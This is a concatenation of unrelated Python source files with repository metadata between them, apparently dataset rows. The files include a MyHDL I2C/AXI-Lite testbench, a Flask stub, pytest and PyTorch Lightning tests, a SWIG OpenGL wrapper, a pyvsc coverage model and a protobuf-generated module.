m_axil_wdata = Signal(intbv(0)[DATA_WIDTH:])
m_axil_wstrb = Signal(intbv(0)[STRB_WIDTH:])
m_axil_wvalid = Signal(bool(0))
m_axil_bready = Signal(bool(0))
m_axil_araddr = Signal(intbv(0)[ADDR_WIDTH:])
m_axil_arprot = Signal(intbv(0)[3:])
m_axil_arvalid = Signal(bool(0))
m_axil_rready = Signal(bool(0))
busy = Signal(bool(0))
bus_addressed = Signal(bool(0))
bus_active = Signal(bool(0))
m_scl_o = Signal(bool(1))
m_scl_t = Signal(bool(1))
m_sda_o = Signal(bool(1))
m_sda_t = Signal(bool(1))
s2_scl_o = Signal(bool(1))
s2_scl_t = Signal(bool(1))
s2_sda_o = Signal(bool(1))
s2_sda_t = Signal(bool(1))
# I2C master
i2c_master_inst = i2c.I2CMaster()
i2c_master_logic = i2c_master_inst.create_logic(
clk,
rst,
scl_i=m_scl_i,
scl_o=m_scl_o,
scl_t=m_scl_t,
sda_i=m_sda_i,
sda_o=m_sda_o,
sda_t=m_sda_t,
prescale=4,
name='master'
)
# I2C memory model 2
i2c_mem_inst2 = i2c.I2CMem(1024)
i2c_mem_logic2 = i2c_mem_inst2.create_logic(
scl_i=s2_scl_i,
scl_o=s2_scl_o,
scl_t=s2_scl_t,
sda_i=s2_sda_i,
sda_o=s2_sda_o,
sda_t=s2_sda_t,
abw=2,
address=0x51,
latency=0,
name='slave2'
)
# AXI4-Lite RAM model
axil_ram_inst = axil.AXILiteRam(2**16)
axil_ram_pause = Signal(bool(False))
axil_ram_port0 = axil_ram_inst.create_port(
clk,
s_axil_awaddr=m_axil_awaddr,
s_axil_awprot=m_axil_awprot,
s_axil_awvalid=m_axil_awvalid,
s_axil_awready=m_axil_awready,
s_axil_wdata=m_axil_wdata,
s_axil_wstrb=m_axil_wstrb,
s_axil_wvalid=m_axil_wvalid,
s_axil_wready=m_axil_wready,
s_axil_bresp=m_axil_bresp,
s_axil_bvalid=m_axil_bvalid,
s_axil_bready=m_axil_bready,
s_axil_araddr=m_axil_araddr,
s_axil_arprot=m_axil_arprot,
s_axil_arvalid=m_axil_arvalid,
s_axil_arready=m_axil_arready,
s_axil_rdata=m_axil_rdata,
s_axil_rresp=m_axil_rresp,
s_axil_rvalid=m_axil_rvalid,
s_axil_rready=m_axil_rready,
pause=axil_ram_pause,
name='port0'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
i2c_scl_i=i2c_scl_i,
i2c_scl_o=i2c_scl_o,
i2c_scl_t=i2c_scl_t,
i2c_sda_i=i2c_sda_i,
i2c_sda_o=i2c_sda_o,
i2c_sda_t=i2c_sda_t,
m_axil_awaddr=m_axil_awaddr,
m_axil_awprot=m_axil_awprot,
m_axil_awvalid=m_axil_awvalid,
m_axil_awready=m_axil_awready,
m_axil_wdata=m_axil_wdata,
m_axil_wstrb=m_axil_wstrb,
m_axil_wvalid=m_axil_wvalid,
m_axil_wready=m_axil_wready,
m_axil_bresp=m_axil_bresp,
m_axil_bvalid=m_axil_bvalid,
m_axil_bready=m_axil_bready,
m_axil_araddr=m_axil_araddr,
m_axil_arprot=m_axil_arprot,
m_axil_arvalid=m_axil_arvalid,
m_axil_arready=m_axil_arready,
m_axil_rdata=m_axil_rdata,
m_axil_rresp=m_axil_rresp,
m_axil_rvalid=m_axil_rvalid,
m_axil_rready=m_axil_rready,
busy=busy,
bus_addressed=bus_addressed,
bus_active=bus_active,
enable=enable,
device_address=device_address
)
@always_comb
def bus():
# emulate I2C wired AND
scl = m_scl_o & i2c_scl_o & s2_scl_o
sda = m_sda_o & i2c_sda_o & s2_sda_o
m_scl_i.next = scl;
m_sda_i.next = sda;
i2c_scl_i.next = scl
i2c_sda_i.next = sda
s2_scl_i.next = scl
s2_sda_i.next = sda
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
# testbench stimulus
enable.next = 1
device_address.next = 0x50
yield clk.posedge
print("test 1: write")
current_test.next = 1
i2c_master_inst.init_write(0x50, b'\x00\x04'+b'\x11\x22\x33\x44')
yield i2c_master_inst.wait()
yield clk.posedge
while busy:
yield clk.posedge
data = axil_ram_inst.read_mem(0, 32)
for i in range(0, len(data), 16):
print(" ".join(("{:02x}".format(c) for c in bytearray(data[i:i+16]))))
assert axil_ram_inst.read_mem(4,4) == b'\x11\x22\x33\x44'
yield delay(100)
yield clk.posedge
print("test 2: read")
current_test.next = 2
i2c_master_inst.init_write(0x50, b'\x00\x04')
i2c_master_inst.init_read(0x50, 4)
yield i2c_master_inst.wait()
yield clk.posedge
data = i2c_master_inst.get_read_data()
assert data[0] == 0x50
assert data[1] == b'\x11\x22\x33\x44'
yield delay(100)
yield clk.posedge
print("test 3: various writes")
current_test.next = 3
for length in range(1,9):
for offset in range(4):
i2c_master_inst.init_write(0x50, bytearray(struct.pack('>H', 256*(16*offset+length)+offset)+b'\x11\x22\x33\x44\x55\x66\x77\x88'[0:length]))
yield i2c_master_inst.wait()
yield clk.posedge
while busy:
yield clk.posedge
data = axil_ram_inst.read_mem(256*(16*offset+length), 32)
for i in range(0, len(data), 16):
print(" ".join(("{:02x}".format(c) for c in bytearray(data[i:i+16]))))
assert axil_ram_inst.read_mem(256*(16*offset+length)+offset,length) == b'\x11\x22\x33\x44\x55\x66\x77\x88'[0:length]
yield delay(100)
yield clk.posedge
print("test 4: various reads")
current_test.next = 4
for length in range(1,9):
for offset in range(4):
i2c_master_inst.init_write(0x50, bytearray(struct.pack('>H', 256*(16*offset+length)+offset)))
i2c_master_inst.init_read(0x50, length)
yield i2c_master_inst.wait()
yield clk.posedge
data = i2c_master_inst.get_read_data()
assert data[0] == 0x50
assert data[1] == b'\x11\x22\x33\x44\x55\x66\x77\x88'[0:length]
yield delay(100)
# TODO various reads and writes
# yield clk.posedge
# print("test 3: read with delays")
# current_test.next = 3
# i2c_master_inst.init_write(0x50, b'\x00\x04')
# i2c_master_inst.init_read(0x50, 4)
# data_source.send(b'\x11\x22\x33\x44')
# data_source_pause.next = True
# data_sink_pause.next = True
# yield delay(5000)
# data_sink_pause.next = False
# yield delay(2000)
# data_source_pause.next = False
# yield i2c_master_inst.wait()
# yield clk.posedge
# data = None
# while not data:
# yield clk.posedge
# data = data_sink.recv()
# assert data.data == b'\x00\x04'
# data = i2c_master_inst.get_read_data()
# assert data[0] == 0x50
# assert data[1] == b'\x11\x22\x33\x44'
# yield delay(100)
yield clk.posedge
print("test 4: access slave 2")
current_test.next = 4
i2c_master_inst.init_write(0x51, b'\x00\x04'+b'\x11\x22\x33\x44')
yield i2c_master_inst.wait()
yield clk.posedge
data = i2c_mem_inst2.read_mem(0, 32)
for i in range(0, len(data), 16):
print(" ".join(("{:02x}".format(c) for c in bytearray(data[i:i+16]))))
assert i2c_mem_inst2.read_mem(4,4) == b'\x11\x22\x33\x44'
i2c_master_inst.init_write(0x51, b'\x00\x04')
i2c_master_inst.init_read(0x51, 4)
yield i2c_master_inst.wait()
yield clk.posedge
data = i2c_master_inst.get_read_data()
assert data[0] == 0x51
assert data[1] == b'\x11\x22\x33\x44'
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
| [
"[email protected]"
] | |
a95da837fce67b1869d7911c2f64fee0ab6ed7c8 | ee8c4c954b7c1711899b6d2527bdb12b5c79c9be | /assessment2/amazon/run/core/controllers/file.py | 61d9b400b2ea8cc711774fd99be3523dd691a551 | [] | no_license | sqlconsult/byte | 02ac9899aebea4475614969b594bfe2992ffe29a | 548f6cb5038e927b54adca29caf02c981fdcecfc | refs/heads/master | 2021-01-25T14:45:42.120220 | 2018-08-11T23:45:31 | 2018-08-11T23:45:31 | 117,135,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | #!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
controller = Blueprint('file', __name__, url_prefix='/file')
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
# if title == 'Republic': # TODO 2
# return render_template('republic.html') # TODO 2
# else:
# pass
| [
"[email protected]"
] | |
a116dd620bfbb78a14a50120bf42574e606bcb13 | 13d222bc3332378d433835914da26ed16b583c8b | /tests/challenge22/test_challenge22.py | 4c076071ad9cc1c5e1409177a3652cf2a89fe86f | [] | no_license | mattjhussey/pemjh | c27a09bab09cd2ade31dc23fffac07374bea9366 | 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | refs/heads/master | 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | """ Tests for challenge22 """
from os.path import abspath, dirname, join
from robber import expect
from pemjh.challenge22 import main
def test_challenge22():
""" Regression testing challenge22 """
name_path = join(dirname(abspath(__file__)), 'names.txt')
with open(name_path, 'r') as name_file:
raw_names = [s.strip() for s in name_file.readlines()]
expect(main(raw_names)).to.eq(871198282)
| [
"[email protected]"
] | |
882eec1a180e7b4c69a1f2fb3cb0584d6a0baf0e | 3f554f2e0ef235d93ecbcbbb2e21132f15ef12fd | /venv/Scripts/easy_install-3.7-script.py | 68156d82a29ee68c2cabcd729c8d29ce9a4302ae | [] | no_license | sanii-muthui/password_locker | 189bb72389734cf59b11f27cf0c71d8d9dc4685a | b82ac4e87cc3301827d744f5e346a2737a959262 | refs/heads/master | 2022-01-09T08:04:37.240307 | 2019-07-22T09:56:20 | 2019-07-22T09:56:20 | 198,190,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 458 | py | #!C:\Users\sanii\Desktop\password_locker\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
| [
"[email protected]"
] | |
636f08c92eda47b8eba96db768288a07393f0e21 | c54f5a7cf6de3ed02d2e02cf867470ea48bd9258 | /pyobjc/PyOpenGL-2.0.2.01/src/shadow/GL.EXT.separate_specular_color.0001.py | f61d2a53884bbcb6d4af41077bbd00d3c40380d1 | [] | no_license | orestis/pyobjc | 01ad0e731fbbe0413c2f5ac2f3e91016749146c6 | c30bf50ba29cb562d530e71a9d6c3d8ad75aa230 | refs/heads/master | 2021-01-22T06:54:35.401551 | 2009-09-01T09:24:47 | 2009-09-01T09:24:47 | 16,895 | 8 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,857 | py | # This file was created automatically by SWIG.
# Don't modify this file, modify the SWIG interface instead.
# This file is compatible with both classic and new-style classes.
import _separate_specular_color
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "this"):
if isinstance(value, class_type):
self.__dict__[name] = value.this
if hasattr(value,"thisown"): self.__dict__["thisown"] = value.thisown
del value.thisown
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static) or hasattr(self,name) or (name == "thisown"):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError,name
import types
try:
_object = types.ObjectType
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
del types
__version__ = _separate_specular_color.__version__
__date__ = _separate_specular_color.__date__
__api_version__ = _separate_specular_color.__api_version__
__author__ = _separate_specular_color.__author__
__doc__ = _separate_specular_color.__doc__
GL_LIGHT_MODEL_COLOR_CONTROL_EXT = _separate_specular_color.GL_LIGHT_MODEL_COLOR_CONTROL_EXT
GL_SINGLE_COLOR_EXT = _separate_specular_color.GL_SINGLE_COLOR_EXT
GL_SEPARATE_SPECULAR_COLOR_EXT = _separate_specular_color.GL_SEPARATE_SPECULAR_COLOR_EXT
glInitSeparateSpecularColorEXT = _separate_specular_color.glInitSeparateSpecularColorEXT
__info = _separate_specular_color.__info
| [
"ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25"
] | ronaldoussoren@f55f28a5-9edb-0310-a011-a803cfcd5d25 |
bb7116e666e458d7ef6f117d052ae161ef3c4f90 | 94b29d5cd65e5783692af9896ea9c983cf182c2f | /tests/utilities/test_apply_func_torchtext.py | ae919668a77ea9363c816014f05272341ca6622e | [
"Apache-2.0"
] | permissive | Programmer-RD-AI/pytorch-lightning | 5d4ab64a887d0ac7d47987241a3213ae59840616 | 02a675241c826d7720c7e15d6fda3f5da0b28116 | refs/heads/master | 2023-08-15T22:04:53.632338 | 2021-10-17T13:47:24 | 2021-10-17T13:47:24 | 413,277,562 | 3 | 0 | Apache-2.0 | 2021-10-04T04:49:55 | 2021-10-04T04:49:55 | null | UTF-8 | Python | false | false | 2,651 | py | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import torch
from pytorch_lightning.utilities.apply_func import move_data_to_device
from tests.helpers.imports import Dataset, Example, Field, Iterator
from tests.helpers.runif import RunIf
def _get_torchtext_data_iterator(include_lengths=False):
text_field = Field(
sequential=True,
pad_first=False, # nosec
init_token="<s>",
eos_token="</s>", # nosec
include_lengths=include_lengths,
) # nosec
example1 = Example.fromdict({"text": "a b c a c"}, {"text": ("text", text_field)})
example2 = Example.fromdict({"text": "b c a a"}, {"text": ("text", text_field)})
example3 = Example.fromdict({"text": "c b a"}, {"text": ("text", text_field)})
dataset = Dataset([example1, example2, example3], {"text": text_field})
text_field.build_vocab(dataset)
iterator = Iterator(
dataset,
batch_size=3,
sort_key=None,
device=None,
batch_size_fn=None,
train=True,
repeat=False,
shuffle=None,
sort=None,
sort_within_batch=None,
)
return iterator, text_field
@pytest.mark.parametrize("include_lengths", [False, True])
@pytest.mark.parametrize("device", [torch.device("cuda", 0)])
@RunIf(min_gpus=1)
def test_batch_move_data_to_device_torchtext_include_lengths(include_lengths, device):
data_iterator, _ = _get_torchtext_data_iterator(include_lengths=include_lengths)
data_iter = iter(data_iterator)
batch = next(data_iter)
batch_on_device = move_data_to_device(batch, device)
if include_lengths:
# tensor with data
assert batch_on_device.text[0].device == device
# tensor with length of data
assert batch_on_device.text[1].device == device
else:
assert batch_on_device.text.device == device
@pytest.mark.parametrize("include_lengths", [False, True])
def test_batch_move_data_to_device_torchtext_include_lengths_cpu(include_lengths):
test_batch_move_data_to_device_torchtext_include_lengths(include_lengths, torch.device("cpu"))
| [
"[email protected]"
] | |
79321ece6462d20918c9ef544c17a191895225db | 8bb3bcf914860c20fb4a7163a8e0691cd802dd65 | /src/vsc/model/coverpoint_bin_single_val_model.py | 2c3d70c1f5e7480e7a886bb90d2225f0d2d90df9 | [
"Apache-2.0"
] | permissive | nitinm694/pyvsc | 8586cc2497f336289fecbfeb9e6dd788f4070b60 | 612de9e6244c685a3df1972e4860abfe35b614e1 | refs/heads/master | 2023-07-28T01:49:10.917496 | 2021-09-12T19:06:00 | 2021-09-12T19:06:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,961 | py |
# Created on Mar 20, 2020
#
# @author: ballance
from vsc.model.bin_expr_type import BinExprType
from vsc.model.coverpoint_bin_model_base import CoverpointBinModelBase
from vsc.model.expr_bin_model import ExprBinModel
from vsc.model.expr_literal_model import ExprLiteralModel
from vsc.model.rangelist_model import RangelistModel
class CoverpointBinSingleValModel(CoverpointBinModelBase):
def __init__(self, name, target_val : int):
super().__init__(name)
self.target_val = target_val
self.n_bins = 1
def finalize(self, bin_idx_base:int)->int:
super().finalize(bin_idx_base)
return 1
def get_bin_expr(self, bin_idx):
"""Builds expressions to represent the values in this bin"""
expr = ExprBinModel(
self.cp.target,
BinExprType.Eq,
ExprLiteralModel(self.target_val, False, 32)
)
return expr
def get_bin_name(self, bin_idx):
return self.name
def sample(self):
val = self.cp.get_val()
if val == self.target_val:
self.hit_bin_idx = 0
self.cp.coverage_ev(self.bin_idx_base)
else:
self.hit_bin_idx = -1
return self.hit_bin_idx
def get_bin_range(self, idx):
print("get_bin_range: " + str(idx))
return RangelistModel([self.target_val])
def accept(self, v):
v.visit_coverpoint_bin_single(self)
def equals(self, oth)->bool:
eq = isinstance(oth, CoverpointBinSingleValModel)
if eq:
eq &= self.target_val == oth.target_val
return eq
def clone(self)->'CoverpointBinSingleValModel':
ret = CoverpointBinSingleValModel(self.name, self.target_val)
ret.srcinfo_decl = None if self.srcinfo_decl is None else self.srcinfo_decl.clone()
return ret
| [
"[email protected]"
] | |
fee13f3a06d66f223110454caf37abb36bc003b4 | b27658fa705c7b6ed3775479cfe960d5889b3669 | /src/pinyin_to_ipa/__init__.py | 73d55cc8f26cbb6a6e5fbf56f4f3f0de5a9c9535 | [
"MIT"
] | permissive | stefantaubert/pinyin-to-ipa | 46f08486461280ee26c951fe350d6fa1c6dcb79d | e8adabaead788fefb23794f62e237836beb3a8af | refs/heads/master | 2023-04-07T07:02:55.192113 | 2023-01-11T10:40:55 | 2023-01-11T10:40:55 | 585,899,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | from pinyin_to_ipa.transcription import pinyin_to_ipa
| [
"[email protected]"
] | |
140cfd85213aede01754e40979397ced1ec71108 | 45c142c3e3dc8d3211a86c77385ecfdd10d28fb9 | /dstore/engine/procedures/mi_ModifyApplicationParts_Ad_pb2.py | 075b058b0e690812b445b033b2dd1155d3dd3e45 | [] | no_license | dstore-io/dstore-sdk-python | 945d64995c8892af18fab26c90117245abec64a4 | 8494d12ac77c3c3cc6dd59026407ef514ad179fc | refs/heads/master | 2020-06-14T13:07:08.181547 | 2017-01-26T11:19:39 | 2017-01-26T11:19:39 | 75,177,794 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 11,926 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: dstore/engine/procedures/mi_ModifyApplicationParts_Ad.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from dstore import values_pb2 as dstore_dot_values__pb2
from dstore.engine import engine_pb2 as dstore_dot_engine_dot_engine__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='dstore/engine/procedures/mi_ModifyApplicationParts_Ad.proto',
package='dstore.engine.mi_ModifyApplicationParts_Ad',
syntax='proto3',
serialized_pb=_b('\n;dstore/engine/procedures/mi_ModifyApplicationParts_Ad.proto\x12*dstore.engine.mi_ModifyApplicationParts_Ad\x1a\x13\x64store/values.proto\x1a\x1a\x64store/engine/engine.proto\"\x9a\x03\n\nParameters\x12\x38\n\x13\x61pplication_part_id\x18\x01 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12!\n\x18\x61pplication_part_id_null\x18\xe9\x07 \x01(\x08\x12\x33\n\x0e\x61pplication_id\x18\x02 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12\x1c\n\x13\x61pplication_id_null\x18\xea\x07 \x01(\x08\x12,\n\x07user_id\x18\x03 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x12\x15\n\x0cuser_id_null\x18\xeb\x07 \x01(\x08\x12\x34\n\x10\x61pplication_part\x18\x04 \x01(\x0b\x32\x1a.dstore.values.StringValue\x12\x1e\n\x15\x61pplication_part_null\x18\xec\x07 \x01(\x08\x12+\n\x06\x64\x65lete\x18\x05 \x01(\x0b\x32\x1b.dstore.values.BooleanValue\x12\x14\n\x0b\x64\x65lete_null\x18\xed\x07 \x01(\x08\"\x86\x02\n\x08Response\x12\x38\n\x10meta_information\x18\x02 \x03(\x0b\x32\x1e.dstore.engine.MetaInformation\x12\'\n\x07message\x18\x03 \x03(\x0b\x32\x16.dstore.engine.Message\x12\x45\n\x03row\x18\x04 \x03(\x0b\x32\x38.dstore.engine.mi_ModifyApplicationParts_Ad.Response.Row\x12\x38\n\x13\x61pplication_part_id\x18\x65 \x01(\x0b\x32\x1b.dstore.values.IntegerValue\x1a\x16\n\x03Row\x12\x0f\n\x06row_id\x18\x90N \x01(\x05\x42]\n\x1bio.dstore.engine.proceduresZ>gosdk.dstore.de/engine/procedures/mi_ModifyApplicationParts_Adb\x06proto3')
,
dependencies=[dstore_dot_values__pb2.DESCRIPTOR,dstore_dot_engine_dot_engine__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PARAMETERS = _descriptor.Descriptor(
name='Parameters',
full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='application_part_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_part_id', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_part_id_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_part_id_null', index=1,
number=1001, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_id', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_id_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_id_null', index=3,
number=1002, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.user_id', index=4,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='user_id_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.user_id_null', index=5,
number=1003, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_part', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_part', index=6,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_part_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.application_part_null', index=7,
number=1004, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='delete', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.delete', index=8,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='delete_null', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Parameters.delete_null', index=9,
number=1005, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=157,
serialized_end=567,
)
_RESPONSE_ROW = _descriptor.Descriptor(
name='Row',
full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.Row',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='row_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.Row.row_id', index=0,
number=10000, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=810,
serialized_end=832,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='meta_information', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.meta_information', index=0,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='message', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.message', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='row', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.row', index=2,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='application_part_id', full_name='dstore.engine.mi_ModifyApplicationParts_Ad.Response.application_part_id', index=3,
number=101, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_RESPONSE_ROW, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=570,
serialized_end=832,
)
_PARAMETERS.fields_by_name['application_part_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_PARAMETERS.fields_by_name['application_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_PARAMETERS.fields_by_name['user_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
_PARAMETERS.fields_by_name['application_part'].message_type = dstore_dot_values__pb2._STRINGVALUE
_PARAMETERS.fields_by_name['delete'].message_type = dstore_dot_values__pb2._BOOLEANVALUE
_RESPONSE_ROW.containing_type = _RESPONSE
_RESPONSE.fields_by_name['meta_information'].message_type = dstore_dot_engine_dot_engine__pb2._METAINFORMATION
_RESPONSE.fields_by_name['message'].message_type = dstore_dot_engine_dot_engine__pb2._MESSAGE
_RESPONSE.fields_by_name['row'].message_type = _RESPONSE_ROW
_RESPONSE.fields_by_name['application_part_id'].message_type = dstore_dot_values__pb2._INTEGERVALUE
DESCRIPTOR.message_types_by_name['Parameters'] = _PARAMETERS
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
Parameters = _reflection.GeneratedProtocolMessageType('Parameters', (_message.Message,), dict(
DESCRIPTOR = _PARAMETERS,
__module__ = 'dstore.engine.procedures.mi_ModifyApplicationParts_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_ModifyApplicationParts_Ad.Parameters)
))
_sym_db.RegisterMessage(Parameters)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
Row = _reflection.GeneratedProtocolMessageType('Row', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE_ROW,
__module__ = 'dstore.engine.procedures.mi_ModifyApplicationParts_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_ModifyApplicationParts_Ad.Response.Row)
))
,
DESCRIPTOR = _RESPONSE,
__module__ = 'dstore.engine.procedures.mi_ModifyApplicationParts_Ad_pb2'
# @@protoc_insertion_point(class_scope:dstore.engine.mi_ModifyApplicationParts_Ad.Response)
))
_sym_db.RegisterMessage(Response)
_sym_db.RegisterMessage(Response.Row)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\033io.dstore.engine.proceduresZ>gosdk.dstore.de/engine/procedures/mi_ModifyApplicationParts_Ad'))
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
8ae19cbd850184aed62ae571f1842958bc3b35ad | e1a2c6ed4a4b93b4697974e3b0a32a4d67daa6f6 | /venv/Lib/site-packages/tensorflow/contrib/factorization/python/ops/gen_clustering_ops.py | 54753d93470f6b328c34c4bb6b06094b62bac888 | [
"MIT"
